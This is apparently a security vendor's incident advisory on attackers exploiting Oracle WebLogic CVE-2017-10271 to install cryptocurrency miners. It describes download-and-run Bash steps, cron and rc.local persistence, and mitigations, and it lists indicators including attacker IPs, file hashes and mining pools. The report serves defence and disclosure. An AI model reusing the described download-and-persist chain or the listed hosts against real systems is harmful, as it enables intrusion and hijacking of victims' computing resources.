Unpatched Oracle WebLogic Servers Infected with Cryptocurrency Software

0

By exploiting a known vulnerability on Internet-facing Oracle WebLogic servers, threat actors deployed cryptocurrency miners to Linux and Windows systems.

In December 2017, Secureworks incident response (IR) analysts responded to multiple incidents where threat actors compromised vulnerable Internet-facing Oracle WebLogic servers on Linux and Windows systems to deploy cryptocurrency software. The unauthorised activity significantly impacted the performance of business-critical and client-facing applications. The continued inquiries about this activity in January 2018 suggest that many organisations have been affected.

Triage of the available data from compromised Linux systems revealed binary files in the /tmp directory consuming processing power and causing performance degradation. When analysing infected hosts, IR analysts discovered a series of POST requests to /wls-wsat/CoordinatorPortType11 that resulted in an HTTP error code 500 (internal server error). The POST requests attempted to exploit WebLogic vulnerability CVE-2017-10271, which Oracle addressed in October 2017. According to the vulnerability description, this “easily exploitable” issue allows an “unauthenticated attacker with network access via HTTP to compromise [an]Oracle WebLogic Server.”

Examination of client environments revealed at least two variations of a Bash script downloaded after successful exploitation. The first variation (see Figure 1) instructs the impacted system to use Wget to download “72 . 11 . 140 . 178/files/l/default” (MD5: faca70429c736dbf0caf2c644622078f) and save it to /tmp/rcp_bh. Once downloaded, rcp_bh is executed to run in the background on the compromised system.

“Figure 1. Bash function to download cryptocurrency software. (Source: Secureworks)”

The second script variation creates two persistence mechanisms based on the impacted service account name. As shown in Figure 2, the Bash script prints the name of the user account running the script. If the account is root, then root.sh is downloaded to /etc/root.sh and executed. If the user account is anything else, lower.sh is downloaded to the /tmp directory and executed.

“Figure 2. Bash script identifying user. (Source: Secureworks)”

If root.sh is executed, it downloads and executes “nativesvc” from 207. 246 . 68 . 21. The script then establishes persistence on the compromised server by creating a cron job and modifying the rc.local file to continually check for the miner and download a new copy if the check fails. If lower.sh is executed, it downloads and executes a cryptocurrency mining binary file named “river” from 207 . 246. 125 . 40 but does not create a persistence mechanism.

Windows hosts running vulnerable Oracle WebLogic servers have also been targeted. Observed attacks have downloaded open-source miners such as XMRig.

These incidents are representative of broader campaigns by financially motivated threat actors to deploy cryptocurrency mining software to large numbers of infected hosts. The market valuation of various cryptocurrencies and the ability to outsource resource costs associated with mining make this kind of activity attractive to threat actors. This type of activity will likely continue as long as cryptocurrency mining provides a return on investment for generating funds.

In addition to reviewing and applying the Oracle security update as appropriate, network defenders should implement the following mitigations. These mitigations also protect systems against other types of threats.

  • Disable unnecessary services, including internal network protocols such as SMBv1 if possible. Remove applications that do not serve a legitimate business function, and consider restricting access to integral system components such as PowerShell that cannot be removed but are unnecessary for most users.
  • Review and apply appropriate security updates for operating systems and applications in a timely manner.
  • Apply the principle of least privilege for system and application credentials, limiting administrator-level access to authorised users and contexts. For Windows systems, consider a solution such as Microsoft’s Local Administrator Password Solution (LAPS) to simplify and strengthen password management.
  • If possible, implement endpoint and network security technologies and centralised logging to detect, restrict, and capture malicious activity. Managing outbound network connections through monitored egress points can help to identify outbound cryptocurrency mining traffic, particularly unencrypted traffic using non-standard ports.

The indicators in Table 1 are associated with this threat. Note that IP addresses can be reallocated. The domains and IP addresses may contain malicious content, so consider the risks before opening them in a browser.

Indicator Type Context
faca70429c736dbf0caf2c644622078f MD5 hash Linux cryptocurrency miner
f79a2ba735a988fa6f65988e1f3d39684727bdc4 SHA1 hash Linux cryptocurrency miner
bbc6f1e5f02b55fab111202b7ea2b3ef7b53209f6ce53f27d7f16c08f52ef9ac SHA256 hash Linux cryptocurrency miner
9d4356274ca394807ae0a6ad82afe2a2 MD5 hash Linux cryptocurrency miner
b19ca7fec674543311214c25078ad7a4e1916253 SHA1 hash Linux cryptocurrency miner
5a788286f82fc78d01dbe2e11776aed1e90b604c12eb826986973e412e0714de SHA256 hash Linux cryptocurrency miner
/tmp/rcp_bh Filename Linux cryptocurrency miner on disk
/tmp/nativesvc Filename Linux cryptocurrency miner on disk
/tmp/river Filename Linux cryptocurrency miner on disk
/tmp/watch-smartd Filename Linux cryptocurrency miner on disk
/tmp/Carbon Filename Linux cryptocurrency miner on disk
pool . minexmr . com Domain name Associated with cryptocurrency mining activity
pool . supportxmr . com Domain name Hosting cryptocurrency mining software
72 . 11 . 140 . 178 IP address Hosting cryptocurrency mining software
207 . 246 . 68 . 21 IP address Hosting cryptocurrency mining software
191 . 101 . 180 . 84 IP address Hosting downloader scripts for cryptocurrency mining software
207 . 246 . 125 . 40 IP address Hosting cryptocurrency mining software

Table 1. Indicators for this threat.

Share.

Comments are closed.